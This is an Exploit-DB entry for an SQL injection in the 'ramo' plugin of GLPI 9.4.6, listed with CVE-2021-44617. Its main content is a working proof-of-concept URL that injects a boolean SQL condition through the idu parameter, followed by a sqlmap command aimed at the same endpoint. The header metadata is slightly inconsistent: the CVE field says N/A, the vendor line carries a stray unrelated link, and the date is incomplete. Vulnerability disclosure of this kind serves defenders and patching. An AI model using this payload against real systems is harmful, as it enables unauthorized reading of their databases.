Baixar GLPI Project 9.4.6 - SQLi

EDB-ID:

50823

CVE:

N/A




Platform:

Multiple

Date:

2022-03-14


# Exploit Title: Baixar GLPI Project 9.4.6 - SQLi
# Date: 10/12
# Exploit Author: Joas Antonio
# Vendor Homepage: https://glpi-project.org/pt-br/ <https://www.blueonyx.it/
# Software Link: https://glpi-project.org/pt-br/baixar/
# Version: GLPI - 9.4.6
# Tested on: Windows/Linux
# CVE : CVE-2021-44617

#POC1:
plugins/ramo/ramoapirest.php/getOutdated?idu=-1%20OR%203*2*1=6%20AND%20000111=000111

sqlmap -u "url/plugins/ramo/ramoapirest.php/getOutdated?idu=-1"